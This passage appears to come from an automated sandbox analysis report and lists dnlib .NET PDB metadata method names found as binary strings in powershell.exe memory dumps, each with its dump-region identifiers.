Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000004.00000002.2453863224.00007FFD34430000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000004.00000002.2453863224.00007FFD34430000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
